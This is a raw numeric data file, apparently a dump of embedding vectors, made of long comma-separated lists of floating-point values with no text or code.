0.0111231655,-0.03032796,0.023337262,-0.020289807,-0.0011749435,-0.005993498,-0.009678718,0.005387209,0.004679227,-0.016359325,0.021758838,0.012752657,-0.009290934,-0.004473153,0.016942395,0.0056165885,0.0019070877,-0.023367098,0.005317737,0.002024117,-0.011914368,0.0060578897,0.0016678452,0.010982707,0.0047127474,0.0030185778,0.020581068,0.007284431,0.028142046,0.006224051,0.009303746,0.0020011312,0.02521472,-0.00041876626,-0.03449937,0.02477186,0.0015584609,-0.02943193,0.005337896,0.004634745,-0.028516203,0.01876742,-0.0038260978,-0.0071209297,-0.042517193,-0.0032481703,-0.009317693,-0.0007003286,-0.0025001073,-0.021263983,-0.026667012,-0.016397877,-0.0042195683,-0.012957239,-0.0064899228,-0.00430328,-0.023789577,-0.004492101,-0.031339448,0.008280941,0.05869301,-0.00956685,-0.040500525,-0.008599463,0.00293275,0.014292787,-0.008728012,0.0059913327,0.0036745882,0.0029429488,0.008265582,-0.0035228517,-0.017711768,0.0014245334,-0.02633043,0.005682156,0.0024801686,-0.02483948,0.002626974,-0.015030394,0.028625667,-0.0067690234,0.0412713,0.00076942804,0.019570317,0.0020468412,-0.026419967,0.039116565,-0.006246863,-0.021386508,-0.011795105,0.0928041,-0.0224912,-0.041341595,-0.0054260725,-0.0007859795,0.008684642,0.04116175,-0.016871208,-0.012817337,-0.007980785,-0.01924799,-0.0075882343,-0.007818718,0.0074316226,-0.02755959,0.04680826,0.024916546,0.00874501,0.0008836722,-0.0019457033,0.0006215214,-0.007055127,0.0071703335,0.045399368,0.02768939,-0.00443081,0.00034456828,-0.0070398957,-0.011486425,-0.007446302,-0.008225523,0.010900305,0.00383345,-0.015329933,0.0058176373,-0.05177706,-0.01666082,-0.006218407,0.02383119,-0.0012240771,0.004533498,-0.005765119,0.010682108,-0.010307777,0.03335684,-0.0072551672,-0.012944727,0.020846553,-0.012038276,0.009936399,-0.0008994625,0.028883204,-0.014487343,-0.008239352,0.0056498996,-0.028931899,0.0050278106,-0.005644254,0.0004903765,0.0034310285,0.027489357,0.00090320525,0.0032310358,-0.00047183098,-0.007207616,0.013251763,0.00859298,0.0014915966,0.001949791,0.02402285,0.0023384842,0.02066675,-0.014027185,0.029130455,-0.0022538241,-0.016236851,-0.0172618,-0.021363296,-0.009731328,-0.002737381,0.014060137,-0.009926019,-0.00415441,0.0021334423,-0.015536692,-0.061807185,-0.016487172,-0.004139301,-0.039026763,0.02281782,0.0032715665,0.0030397377,0.04135384,0.0052447533,0.018103892,-0.020057872,0.013829773,0.003251724,0.0024667575,-0.0061604315,0.0051819286,0.038425665,-0.0020524585,0.009049312,-0.0055803754,-0.02502499,-0.01354897,-0.010613388,-0.0036849596,-0.033945728,-0.014498858,-0.0039820373,0.016465092,-0.007269631,-0.01006446,0.045500625,-0.031676706,0.0042236624,0.018552518,-0.018176775,-0.019530486,-0.020386431,0.00743346,-0.009831292,0.025638316,0.0018721006,-0.012401693,0.016513474,-0.022575123,0.014933576,-0.004815987,0.028485537,-0.008612992,0.00884913,0.010605403,0.0002853823,-0.009318205,0.02606141,0.004894208,0.007800931,-0.013835911,0.005716683,-0.0004944533,0.0063716127,0.005103502,0.011778845,0.013092366,-0.007073933,-0.009122558,0.0019081905,0.0059712837,-0.006610352,0.0007523501,-0.0010463088,0.016099023,0.011842815,-0.016079893,-0.004759311,-0.007944721,-0.01425256,-0.0051519293,0.019397167,0.026101539,-0.015449635,-0.018842414,0.015426267,0.009952635,-0.018076107,0.017941348,0.0015697406,0.003505074,-0.035725463,0.016827509,0.0011254145,-0.004435296,0.01575014,0.020861909,-0.0085501475,-0.0290963,0.01545981,0.025874844,0.017834516,-0.021727856,0.0031844024,0.0019768854,-0.007301248,-0.004335351,0.031608414,-0.009590346,-0.011363929,-0.025719933,-0.002258475,-0.019541934,-0.004996674,-0.018563015,0.0029949038,0.027838655,-0.015031539,0.021258315,0.022889469,0.01014424,0.020685462,-0.00440824,-0.039887004,0.019715644,-0.0015789678,-0.034327347,0.004849123,0.0020891593,0.014084096,-0.015252481,0.011272694,0.004182026,-0.0076946295,0.007062521,0.012500042,-0.0072955913,0.01531603,-0.0139898015,-0.018937083,-0.009645237,-0.0064862473,0.023401113,0.02819576,-0.031340607,0.0064480305,-0.01060072,0.0601647,-0.016047904,-0.005855674,0.0067234538,0.033147376,0.0199023,-0.0040553096,0.0055798106,-0.032979734,-0.0024827027,-0.015246394,-0.028930726,-0.0010557336,0.013403699,-0.013178315,-0.020968871,-0.008053954,0.003739441,-0.014564219,0.00084535807,-0.021236042,-0.006251855,0.0258258,-0.0021330651,-0.0073955483,-0.024907097,-0.009484709,0.0098420195,-0.01876306,0.016798893,-0.00069639424,-0.018735828,-0.005595803,-0.028676374,-0.005756615,-0.019606039,-0.010531541,-0.012645956,0.00057755236,0.018854694,0.017124401,0.008314346,-0.0056289267,-0.0101068765,-0.004221996,0.012390221,0.0033975807,0.011788029,-0.010694727,0.011832275,-0.0062956815,0.022014143,0.004413555,-0.00841702,0.018654551,0.008482541,-0.0010727006,-0.0075012166,0.017513335,0.0120290145,-0.0031178112,-0.007357229,-0.004204328,-0.008429526,0.023518406,0.0008261529,-0.00197,-0.0147457905,-0.007034888,0.0069707963,-0.011747329,0.029598022,0.008696958,0.01772615,0.0030437005,-0.0012621942,0.016349154,0.007997613,0.019387143,0.013063051,0.010816791,-0.0054929303,-0.024013035,-0.009623405,-0.014618034,0.004358878,-0.02364522,-0.006122234,-0.008016627,-0.0029838677,0.027958855,0.00040363686,-0.018524589,-0.009779539,-0.0065780976,-0.007674304,-0.0027004594,-0.012769491,0.008393591,-0.00813319,0.0014495172,0.0089592105,0.025006508,-0.0034633868,-0.0108453045,-0.005225687,-0.12808035,-0.001670575,0.0007003145,-0.003495712,-0.005595494,-0.003251919,0.014277148,0.07304574,0.013274446,-0.052192114,0.012218384,0.027237777,0.008667897,0.0047494355,0.004534856,0.0073927063,0.005379643,-0.006798346,-0.0057608048,0.00571499,0.0007562504,-0.0014619718,-0.00042251401,-0.013080287,-0.013922683,0.027444134,-0.011521489,0.01067069,0.013177144,0.02235695,0.010939184,0.0038385084,-0.0014164071,0.005789296,0.0044361614,0.01972191,0.0012276198,0.016349852,-0.0065495027,-0.0017483964,0.008969197,-0.0055381344,0.003698701,-0.001563494,0.0061017605,0.0055890274,0.014692683,0.010061859,0.024314847,0.0066091344,-0.004637668,0.00049564015,0.025076462,0.0029717358,-0.005775684,-0.023416512,-0.022265557,0.006905973,-0.00046192674,-0.01907753,0.008637683,0.015896903,0.005870626,-0.019642511,-0.014488137,0.0046996525,0.0027283211,-0.015952345,-0.018930668,-0.008370811,-0.009034694,0.0086630415,-0.010264988,0.017510323,-0.001866503,0.004691487,0.02472418,0.0065406347,0.0017166426,0.038612615,-0.011581148,-0.012645629,-0.0012461767,0.013752992,0.0071604797,0.007217514,0.0026349674,0.006673966,-0.004915612,-0.01058554,0.008644082,0.008050546,-0.02510661,-0.015359747,-0.0069026705,0.002835567,-0.0045051454,0.021380896,0.018869111,0.0060597085,0.017415356,0.008446397,0.012003948,-0.009223541,-0.114757404,0.018732365,0.03565749,-0.013100455,0.0064322967,-0.0093819145,0.0039155306,0.002307349,0.015594076,0.006808727,0.005624099,-0.0010618155,0.024818959,0.024226263,0.020624768,0.012538618,-0.033534277,0.009727941,0.00994395,0.010771783,0.008821823,0.004844723,-0.032742005,-0.009379264,-0.0029922335,0.0004782321,0.0016953812,0.023264656,0.03564905,-0.0031996067,-0.0029884125,0.0016572124,-0.006910751,0.011925945,-0.018784678,-0.024945965,0.0027310143,0.0050655934,-0.011630618,0.004346546,0.00977406,-0.00789983,0.0057037557,-0.0018890483,-0.012790864,0.008897366,0.00081632676,0.01923623,-0.0015837986,0.0028804052,0.0018221391,0.0021017375,-0.0039570183,0.015247707,-0.004033724,-0.027069977,0.004593374,-0.012323705,-0.009714055,0.013005169,-0.013827229,0.009258713,-0.012322076,-0.0058230907,-0.010561509,0.020745628,0.0085330615,0.004573503,0.003538357,-0.0075896997,-0.0021685534,0.015057971,0.033860687,0.010850895,0.02006987,0.019496255,-0.0042145043,0.017057842,0.020939754,-0.0052475156,-0.012181093,0.005151986,-0.014066741,-0.0015224951,-0.0070161605,-0.0018200909,-0.0026974215,0.0076953564,0.0015329986,0.011648881,0.0051777866,0.02176192,-0.013064737,-0.022326062,0.024403712,0.0127071515,0.014252102,0.005499039,-0.011672577,-0.0046159397,-0.029696614,-0.0022241962,-0.009217453,0.024991792,-0.014283654,-0.006385506,0.0042932606,-0.009358963,0.014134481,0.006199874,0.0018596426,0.03550199,-0.015102252,0.0053930334,-0.009277559,0.00077838096,-0.020902915,0.0036459588,-0.0007602293,0.02096344,-0.006708762,0.013608919,-0.0027217458,-0.019336447,-0.015843116,0.015307213,-0.0008205623,0.039010964,-0.012948407,-0.009618972,0.0029162292,-0.0066602654,-0.0019156887,-0.027504304,-0.007236599,0.0005460367,0.0031891726,0.004917888,0.008225406,-0.00080858276,0.0005861346,-0.020886987,0.021609342,0.032357186,-0.0060326047,-0.022318615,-0.0025294074,0.019799927,-0.01546913,0.009398275,-0.035542358,-0.016901273,0.0023813774,0.015531339,-0.0006211149,0.005627378,-0.010447125,-0.0059616524,-0.0034758986,-0.008655904,-0.009642101,0.01675715,0.012266741,0.006767401,-0.0067898375,-0.02321304,0.009584721,-0.006758046,-0.008484345,-0.009966854,0.015636547,-0.0032865794,-0.012618958,-0.018408984,0.015473921,0.017027387,0.026767815,0.049707796,0.007914214,0.02015357,0.005522938,0.0050812936,-0.026160737,0.005222933,0.0184214,0.006775174,-0.021053502,0.009205113,0.0007565244,-0.009544829,0.026544476,-0.014000264,-0.02616511,0.0016977722,0.009392163,0.008315762,0.002838225,0.0033573578,0.016510986,-0.025674634,0.0014506839,0.021815134,-0.004501296,-0.0049518747,0.0055605043,0.012702686,0.004756018,0.013966825,0.026602233,-0.006921165,-0.013489273,0.008188936,-0.0058525377,0.0071401154,0.010856175,0.018679935,0.0009692482,-0.014809982,0.019385915,-0.011425365,-0.0010178307,-0.015982067,0.017736271,-0.02546498,0.02565722,0.022369888,0.008169431,-0.008185544,-0.012929505,0.0015354431,0.0092656575,0.019046038,-0.0074172025,0.004275826,0.0012329413,-0.01299597,0.017320678,0.0019488438,-0.017613748,0.022839945,0.015891118,0.024523169,0.023492375,0.014572394,0.0072051957,-0.009696648,-0.007712119,0.014670428,-0.007895077,0.0073321923,0.0014534646,-0.008220391,-0.011339857,-0.009557831,0.02432516,0.014376151,0.019380031,0.014556418,-0.0017251074,0.008235238,-0.022369625,0.00086038583,-0.0017611803,0.008001276,0.02129935,-0.008261407,0.011644396,-0.030036697,-0.0030047414,0.016155748,-0.013324267,0.0032102542,-0.007437723,0.016756805,0.0011021533,0.000019556122,-0.017762884,-0.00447428,-0.010895107,-0.0048595746,-0.0065884423,0.00071718165,-0.016806966,0.008248727,-0.009988731,0.00634611,-0.00069560396,-0.0023080213,-0.003401875,0.0025693208,0.002141639,0.0034189736,-0.0029243417,-0.02620975,-0.00095225027,0.008837634,0.029016087,0.0027595793,-0.010669742,0.0046608527,0.015291788,-0.0022954377,-0.00306864,0.027410276,-0.013916248,0.005192654,-0.004345046,0.008736918,0.0132739935,-0.009944001,0.00840774,0.022655305,-0.0006827578,0.0077148294,0.017148051,0.0013906886,0.0003308442,0.0025913303,-0.0030735447,-0.0069106836,-0.007434434,-0.025922997,0.027379418,-0.018117994,0.017626286,0.02990571,0.01930247,0.0058133877,-0.022074569,-0.0017543244,0.022233186,0.02142251,-0.017215617,-0.008087832,0.01659321,0.005768486,0.0014883793,0.021762451,-0.0034450241,0.015892012,0.009944297,-0.001272219,-0.0063884677,-0.0058380533,-0.011975454,0.00029436947,0.005666788,0.005862183,0.014553976,0.00084231206,0.013860755,0.0068747844,0.0035350083,0.0077018496,-0.0154817365,-0.004966772,-0.020410838,0.00662232,0.0061880434,0.0024388693,-0.019858573,0.018735059,-0.008834971,0.010043488,0.00067008566,-0.007160465,0.0022619679,0.012161335,-0.01943846,-0.0038486726,-0.0010328299,-0.011852062,-0.007139194,-0.0064282482,-0.022774758,-0.08183385,-0.013707667,0.015467126,-0.018668598,0.027675843,0.0053432523,-0.030141208,-0.014368964,-0.020720541,0.018160451,-0.008086192,-0.010825083,-0.008132451,0.016753007,0.019792337,-0.0067402786,-0.015502287,0.0007456168,0.0003066689,-0.01000259,-0.011998748,0.018108021,0.008933614,0.009837245,0.007971027,0.0053666555,0.0000047120084,-0.022796854,-0.009465343,0.005404243,0.00571142,-0.007337134,-0.0054653264,-0.008388692,0.002306857,0.012908009,0.004059636,0.02419578,-0.018692596,-0.028605226,0.01687144,0.006654332,-0.0054255556,-0.004895981,0.0011097972,0.0057698893,-0.058702614,0.0034211152,-0.02328735,-0.00040032418,0.015451422,-0.0036828849,-0.0227091,0.016071176,0.037384942,0.028588407,-0.0035171409,-0.011936314,0.020299394,0.002282399,-0.014866612,-0.014922755,0.0074914377,-0.013745618,0.007865434,0.028386617,-0.015831297,0.016531566,-0.0036145917,0.019645046,0.019979013,-0.008100088,-0.019621307,-0.031639334,0.00078432035,0.017231863,-0.008646651,-0.0055854935,-0.0022826723,0.009540744,0.02165096,0.011841976,0.007825194,-0.003390845,0.020054374,0.009999386,-0.008076251,0.02185089,0.030011132,0.019354036,0.015247067,0.0043063555,0.01207759,-0.013687761,0.003662396,0.015335892,-0.015524337,-0.011432472,0.010565756,0.008371291,-0.01440884,-0.012930449,0.0065081194,-0.004808189,-0.0069710864,0.0026327765,0.003950966,-0.0038490158,0.0013947253,0.0033333027,-0.009237727,0.021005608,0.038086697,0.027100246,0.010750036,0.0087296795,-0.014424528,0.018055964,-0.013294732,0.015879028,-0.016284654,-0.019457744,-0.011915022,0.013295425,0.0029215913,0.0040147784,0.008519141,0.0020044656,-0.013767634,0.0010720222,-0.024494838,0.030136093,0.015359292,0.01757983,-0.008211675,0.029428372,-0.03716396,0.008472296,-0.017549401,0.01606929,-0.015709242,-0.04249194,-0.00043024283,0.024593845,-0.022892063,0.016093012,-0.00909097,-0.0010528432,0.0004925215,-0.0048907315,-0.01169325,0.005205642,0.026354633,-0.0017074008,0.001615103,0.006154536,0.0056994967,0.0071591744,0.005227138,0.0028197137,0.008929694,0.008409732,-0.00801338,0.00094557856,-0.030695258,0.017540123,0.011946184,-0.006797125,-0.006108471,-0.02233586,-0.017134685,-0.00839557,0.004280991,-0.0019767664,-0.013290363,0.022678314,0.032794252,0.010871559,-0.017250914,-0.0025868255,-0.004523099,0.0010385956,-0.006155615,0.014870484,-0.019395467,-0.011118255,-0.011690534,-0.013984182,0.0019350749,-0.018131787,0.008519628,-0.014257707,-0.0031073852,0.007026357,-0.02985432,0.010937218,0.00622659,-0.00084681524,-0.004085954,-0.0044423756,-0.023802541,0.005902805,-0.004463836,-0.004128959,0.01379949,-0.017011764,0.016445128,-0.0033488616,0.0022444653,0.02094334,0.004769116,-0.008082731,0.012432372,0.124674395,0.015901221,-0.03345259,0.0056241876,-0.0018915922,0.036849182,0.012991966,0.0009508885,0.009046902,0.010791794,-0.0046018832,-0.014505799,0.019726142,-0.0002360037,-0.008225027,0.019364497,0.013617161,0.00046550823,-0.0054632886,-0.0018902044,0.010233694,-0.031651728,0.008046844,-0.0061721005,0.0038223334,-0.04252073,0.012848963,0.02642137,-0.0042108265,0.018019522,0.013845161,0.011445334,0.0026822211,-0.012799875,-0.014883526,0.0021287673,0.023422869,-0.010266825,-0.00222884,-0.008643863,0.0012138708,0.010937207,-0.002971502,-0.018224047,-0.01100409,0.015685432,-0.013466557,-0.031969815,0.016794518,-0.005430764,0.012122544,0.012160512,0.014254382,-0.0038487834,0.009565417,0.014539662,-0.006021627,-0.0047831046,-0.009866697,0.000032609645,0.02840245,-0.012817021,0.005923828,-0.0040100943,-0.004755413,0.00710408,-0.014739666,-0.012994625,-0.015229283,-0.02759211,0.013178446,-0.015050045,0.0015176623,0.003982505,-0.005819368,0.019053277,-0.009229944,-0.0043663653,-0.009009944,-0.006655115,-0.0037563557,-0.006113209,-0.00059194624,0.0011938984,0.010508094,-0.0010913133,-0.004265196,0.0011691039,-0.0052649733,0.001334471,0.0034952117,0.012997033,0.0043901564,-0.006219733,-0.0067797834,-0.011767922,0.017631426,-0.015100485,-0.007880893,0.022544729,-0.00222166,-0.012765609,-0.026076596,-0.002412255,-0.01296938,0.0036989988,0.008642649,0.024258088,0.0018923767,-0.0054422333,0.010621585,0.00010490641,0.001192534,-0.009775052,-0.004164713,-0.0027272683,0.01097329,-0.016527716,0.020770475,-0.009079002,-0.0048512225,-0.0029963348,0.0016579865,0.02937064,0.009076003,0.019325063,-0.005253899,-0.0027380479,0.010895367,0.0136512825,0.002687346,-0.027721751,-0.0010535371,0.004021333,-0.0012389055,0.0067910464,0.013417804,0.013082307,0.011357705,0.001592707,0.0059980364,0.00969521,-0.00945443,-0.007213627,-0.0040869415,-0.02915104,0.009721725,0.0007961379,0.014497938,0.0041029244,-0.0058207116,0.02593424,0.017225664,-0.015917683,-0.014109515,-0.014723761,0.008929467,-0.0022575916,0.011163046,-0.014657866,0.0049007954,-0.0052530835,0.008930552,-0.04101154,0.015805801,0.0124655105,0.016309135,0.0032312116,0.017430177,-0.0048737866,-0.014033637,-0.014522277,-0.015957149,0.019218132,-0.01678108,-0.0041928613,-0.010769799,0.021110937,-0.019488804,0.012598321,0.045582034,0.0070099565,0.008192127,0.019049887,0.0051580793,-0.006593659,0.009392939,0.0044621015,0.008429818,0.027645119,-0.008916032,0.014300506,0.013629751,0.014224576,0.0125264255,-0.005856747,-0.031658433,0.047125112,-0.032928593,-0.03432487,-0.009426324,-0.012602942,0.015455375,-0.008655042,0.023054572,0.0017443678,0.018020198,0.010464788,-0.0134705985,0.0050029587,0.008453662,-0.0037135826,-0.014037555,-0.0005322365,-0.010796033,-0.0016963349,-0.031425156,0.0062352847,-0.045999415,0.016754184,0.015128164,-0.007860464,-0.001516988,0.00040701317,-0.0035451152,-0.0042269784,0.002755131,0.025238896,0.022912418,-0.0029928146,-0.0058292937,0.006554464,-0.0030341772,-0.024549127,-0.0086479215,-0.009227648,0.006493967,0.00047830417,-0.007738377,-0.005301864,-0.008407569,0.0062915455,0.014210648,-0.003784593,-0.032415036,0.010708936,-0.001536166,-0.012116942,-0.022756204,-0.022874635,-0.02159615,-0.0022345379,-0.026048172,0.0047350246,-0.032082465,-0.01425432,-0.017439352,0.012047365,0.009414846,-0.022734182,0.0002633674,0.0044117616,0.008193237,0.019736577,0.0025204418,-0.0041054245,0.009369339,-0.009126792,-0.016910892,0.008754553,-0.0017865794,-0.009449812,-0.02418989,-0.011309858,-0.0084904265,-0.009735692,-0.019055737,0.0011415507,-0.014522786,0.013897561,-0.010790762,0.0045917574,0.020235727,-0.011444472,0.0013545752,0.0040224823,0.009063611,0.015833305,0.012983049,-0.04705938,-0.005012892,0.02496208,0.009372123,-0.018947996,0.0062756143,-0.013005692,-0.047148943,-0.025586791,0.03440249,-0.012620413,-0.010805132,-0.011000898,0.0029145642,-0.0028382498,-0.021285087,-0.0065817335,-0.0024540515,0.0023048525,0.0011279674,0.010471073,-0.008667894,-0.00012859717,0.0069572986,-0.013099519,-0.005395141,0.006248558,-0.001946434,0.0022252854,0.011771842,0.014467536,0.026591526,-0.014780709,0.0032160403,-0.0024494226,0.0033407547,-0.011777985,0.011215189,-0.024896251,-0.038647562,-0.017111901,0.009929091,-0.018789668,0.003047911,-0.0059009264,-0.013897567,0.014934756,-0.0027863444,0.15990494,-0.0030173212,-0.02123395,-0.004558682,-0.011793457,-0.011215766,0.0037824132,0.0020904227,-0.0125902835,0.0044965744,-0.00011403535,-0.004883481,0.010616082,0.014634547,-0.0018319179,-0.017959522,0.0003556699,0.12578347,-0.000183403,0.022352327,0.031785484,0.014988696,0.020160664,0.0074749575,0.04538611,-0.057170246,-0.0062851836,-0.027330056,0.012164822,-0.010337138,-0.002313161,0.01123859,0.0065132813,0.008994481,0.013082434,0.011236409,-0.011692995,-0.024700748,-0.033724375,-0.014103113,0.012684918,-0.02049095,-0.0021845794,0.017548297,-0.0022579439,-0.0056246324,-0.025586167,0.010543096,0.014070811,0.033681165,-0.00015566737,-0.004157118,0.011912452,0.0033086564,0.022253413,-0.014984746,0.004280381,0.017357858,-0.018051842,0.022314372,0.017323958,0.012441549,-0.021096326,0.015629511,-0.023283614,-0.01010649,-0.013630898,-0.010283691,-0.017827686,0.0031338918,0.01400592,-0.003825365,-0.018129157,0.005832302,-0.0059487014,-0.013565185,-0.015981719,-0.018937627,0.0065080873,-0.010793289,0.03843671,0.036279246,-0.00028042577,0.003224667,0.023862727,0.04313802,0.0039734505,0.015513794,0.0063943155,-0.0022982853,-0.013070753,0.0067870356,-0.005871183,-0.0042154514,-0.012466899,0.020775443,-0.011375652,-0.0068600876,0.010050161,-0.026384285,-0.018717598,-0.00048742138,-0.008600554,-0.002733314,-0.013269015,-0.0010221127,0.0009420108,-0.003982971,-0.0054940507,-0.0026810307,0.027149485,0.015578304,-0.005276558,0.015539854,-0.03145676,-0.010210535,0.02223401,0.003632234,-0.034465645,0.022556111,-0.0032820168,-0.011937379,0.01746358,0.008144798,-0.0041931667,0.0071074115,0.0061956937,-0.026613845,-0.0343814,-0.010688068,0.008377779,-0.008201791,-0.0029782744,0.033744913,0.015214897,-0.0155246975,-0.00011181747,-0.053737745,-0.01331914,-0.0073426045,0.0011211801,0.021967527,0.0068471488,0.007766101,-0.015563455,-0.001972116,0.0011061426,-0.0038313072],[-0.0013898831,-0.006315783,0.01391467,0.0069936323,-0.009290664,-0.021347832,-0.014953079,0.0124346865,0.006353587,-0.007392594,-0.0010169368,0.03418596,-0.00692315,-0.0037375586,0.0038985743,0.006381673,-0.007474871,0.0024222378,0.0072287284,0.0017293977,0.005487987,-0.01909381,0.024120236,0.011518852,0.02606982,0.034631275,0.00029185633,0.008678986,-0.0073171207,0.007978933,-0.008593687,0.024142066,-0.0007283796,-0.006161901,0.020608773,-0.0020180224,-0.005533098,0.0037042343,-0.0038965123,-0.0025637946,0.015382133,-0.00567417,-0.0074056135,0.0075398707,-0.021188207,-0.0032902537,0.0033575015,-0.0017126938,-0.019872483,0.0059444956,-0.003957308,0.03159754,0.0070055705,0.018644957,0.0006226999,0.0014338146,-0.01936256,-0.026045417,0.018338654,-0.00991806,-0.0075484808,0.008772605,-0.006777683,0.0088585075,0.019726489,-0.019940717,-0.0029342335,0.0058393995,-0.0011033836,-0.00862828,0.04182404,0.0035061294,0.008782269,-0.00043783512,-0.0029189256,0.015789885,0.010031031,-0.014203586,-0.0056116227,-0.00084061053,-0.009941074,0.0032520154,-0.003936945,-0.005843467,-0.0069372384,0.016021844,-0.018053351,-0.010786506,0.00010221495,-0.0074343863,-0.014836703,0.009978096,-0.011506334,0.017235374,-0.0021682477,0.032246828,0.0056360047,0.0068066968,0.006937413,-0.021306597,0.008889465,-0.022581715,-0.015198907,0.0103182485,0.011225492,0.018756254,0.0031534678,0.00056881754,-0.0069322134,0.017764486,-0.017552491,0.004138843,0.011546532,-0.012150591,0.011037566,-0.016245138,0.0075718355,0.016293379,-0.008382109,-0.013979785,0.0074464604,0.0028285848,0.019310514,0.003589697,-0.015978483,0.0047334065,0.0036100114,0.0071064583,-0.0044194167,-0.023459507,-0.009057901,0.020652035,-0.00524758,0.0078827,-0.010737892,-0.004868487,-0.002068971,-0.003647388,0.0057100332,-0.02197565,0.012022178,0.008529707,0.029763298,0.0076157595,-0.0026759796,0.022769343,0.013815319,0.019145269,0.01981862,-0.01293353,0.02015513,0.0024019051,-0.00241617,-0.006184878,0.0076674456,-0.002125835,-0.013860418,-0.0031531113,0.013588979,0.015326048,0.00045787074,0.008976414,-0.018474594,0.031542465,-0.0029023443,-0.0030657144,0.0049637323,-0.0069484967,-0.019810911,-0.004485939,0.0031510508,0.024726983,0.013607039,-0.012464721,-0.0012048859,0.013197176,0.0051394906,-0.0038840442,-0.0067086504,0.023780352,-0.0071351184,0.04033002,-0.007671666,-0.0037105677,0.014766623,0.0027641624,0.010436049,0.006713755,-0.013038507,-0.0071833176,-0.008528986,-0.013509742,-0.011349882,-0.00017036962,-0.011607174,-0.008315229,-0.017783748,0.09151235,-0.005411346,-0.008186271,0.0016312551,-0.00695626,0.00001736701,-0.004238827,-0.044420294,-0.003984375,-0.020802937,0.014839827,0.0058777207,-0.017641686,0.01730925,0.0021572127,0.019820435,0.009576818,0.02007869,-0.1034723,0.012121933,0.03205067,-0.018876461,0.005894916,0.0026737694,0.009372188,-0.012249699,-0.017355997,-0.020525934,-0.015669648,-0.013066311,-0.013428188,0.0035178622,-0.03727963,0.017920367,0.015710225,-0.009556178,-0.02376472,-0.017839486,-0.0312941,-0.016075524,0.00074965745,-0.0053445413,-0.0019254643,-0.02916263,0.005109496,0.010928527,0.0062843477,-0.008931649,-0.010474283,0.0070511648,-0.0017911649,0.01468914,0.010554632,-0.031405076,-0.017710488,0.003845339,0.013208564,-0.004899874,-0.008193699,0.002948111,0.0042967526,-0.0067642787,-0.010464555,0.004647262,0.013475022,-0.027192215,0.0059349253,0.017062727,0.004773407,0.009009143,-0.030796707,-0.015322251,-0.0020681026,-0.024212608,0.0032589238,0.025820835,-0.018558133,0.024046699,0.01353996,0.02560448,0.0002664004,-0.004350722,-0.015141306,-0.011689079,-0.024671033,-0.0039022896,-0.0098185325,-0.008970935,0.0064408327,0.02269058,-0.008668782,0.008248622,-0.016015891,0.0054203905,0.018986152,0.032545358,-0.005193114,-0.015570107,-0.015269084,-0.03621916,0.031582758,0.014473836,-0.021609837,-0.023050029,-0.020715725,0.018320883,-0.008270676,0.01701021,-0.0050008697,0.0055961935,0.010562266,0.0005734984,0.01280259,0.00051031343,-0.021082712,-0.01575023,-0.004833787,0.013937477,0.017586026,-0.010791753,-0.0080060745,0.006628598,0.026895091,0.005610922,-0.0018182653,-0.0076724067,-0.011573656,0.0057997606,-0.0048088892,0.0196577,0.00035182136,0.012093511,0.026809206,0.00046222497,-0.003785832,0.02204385,0.016647821,-0.032229718,0.026071478,-0.0017100269,0.047009904,0.0066283736,0.03822805,-0.015298976,-0.00361422,-0.006686515,0.016405573,-0.0077243266,0.013594119,-0.01360818,-0.017021934,0.017259967,0.006756769,0.011318357,-0.018496923,-0.009349122,0.0022195233,-0.0070276554,-0.009679934,-0.0091225235,-0.014590588,-0.0121442545,-0.018946262,0.028262375,-0.009466342,0.018586759,-0.0026503014,0.042263888,0.0009164352,-0.019402912,0.0250771,-0.007886312,-0.014058743,0.04252349,0.030511318,0.007360982,-0.019346602,-0.022429878,0.0022491459,0.00094323716,0.01802616,0.0023652562,-0.015188428,-0.028227663,0.0064997845,-0.010460413,-0.015872175,0.021292241,0.016213004,-0.0020411836,0.018709177,0.015000781,-0.004283265,0.00030086847,0.003657401,-0.00006188199,-0.004740511,-0.012471688,-0.015584669,-0.0057795662,0.001990597,-0.005583376,0.015217927,0.026534652,0.00785709,0.009325498,0.005451503,-0.012736872,-0.0097954115,0.004392927,-0.0057637095,-0.016713427,0.033524655,0.008096368,-0.010586716,-0.016575752,0.011988713,0.028478235,0.00731106,-0.031015225,0.01342613,-0.009921906,0.021086242,0.015272524,-0.010556043,0.00434028,0.030737119,0.034034766,0.023964917,-0.019293532,0.031899787,0.023469632,0.031916615,0.0015786879,-0.005358513,-0.042736713,-0.01325237,0.008236399,0.020437192,0.000018463907,0.02315086,-0.014271883,0.004975999,-0.0026998003,-0.0062890295,-0.022089375,0.035118967,-0.018588841,0.0011062217,0.0074429386,-0.0056311297,-0.00037431353,-0.0049788277,0.017375153,0.0031875714,0.024904743,-0.014909451,0.013662333,0.011206829,0.022054665,-0.016103575,0.017803507,0.00069986575,0.020586971,-0.02380838,0.0070254407,0.0026001874,-0.004616591,0.011286704,0.015436654,-0.008636839,0.011258607,-0.012530223,-0.006381272,-0.019384358,-0.0025030018,0.031051936,-0.015470406,0.00265989,-0.027873818,0.02451419,-0.0058137495,-0.021909192,0.0047118785,0.0013263829,-0.010433849,0.024052862,0.03351697,0.019122973,0.0049965894,0.010764177,-0.0022484118,0.0068846554,-0.008010816,0.008229923,0.010367297,0.022139313,-0.0055262013,-0.0058516967,-0.00092924375,-0.031857625,-0.025791628,0.010352395,0.005556159,-0.03630598,0.01664222,-0.0014899217,0.0019921192,0.008060252,0.033712793,0.005327188,-0.0034033395,0.019071853,0.004545996,-0.008277168,0.017729012,-0.0058172783,-0.008916562,-0.023397278,0.016594667,-0.015015434,0.0035879205,0.0021018584,0.01827607,-0.022115117,-0.01562533,-0.0004815241,0.033418436,-0.027669283,0.012757483,0.015054562,-0.0059251026,0.018128486,-0.011707159,0.06718948,-0.0048371223,-0.024286682,0.0076684575,0.020376384,-0.014158394,0.01211853,0.008692049,-0.003793861,-0.011902484,0.00570037,-0.00708387,0.00071647234,0.0030744812,-0.008332609,-0.0063058077,0.004459733,-0.0073897927,-0.019797958,-0.007252747,-0.0036771686,-0.013996713,-0.025529737,-0.04312444,0.008333783,-0.007430065,0.009698138,0.011435367,0.02023728,-0.00385847,-0.011885531,-0.005800848,0.012024663,-0.000032372845,0.008745438,0.007470206,0.010587893,0.015596711,0.015552951,0.037856404,0.0095188655,-0.0030266878,0.013810242,0.019459132,0.001548805,-0.022467412,-0.028621035,0.0160826,0.016388955,-0.0011355662,-0.009938255,0.0032103658,-0.0013721484,0.00728455,-0.0030456036,-0.013311505,0.023717828,0.016590739,-0.026338255,0.018379489,0.0045029656,0.022240894,0.006529163,-0.0051932205,0.009791029,-0.002778949,0.008065079,0.003280914,0.012044267,-0.0293225,0.010000575,0.003123132,0.013459751,0.008176496,0.009921552,0.015354931,0.00083540997,0.032633584,0.018062858,-0.0053062625,-0.0046845055,0.00393695,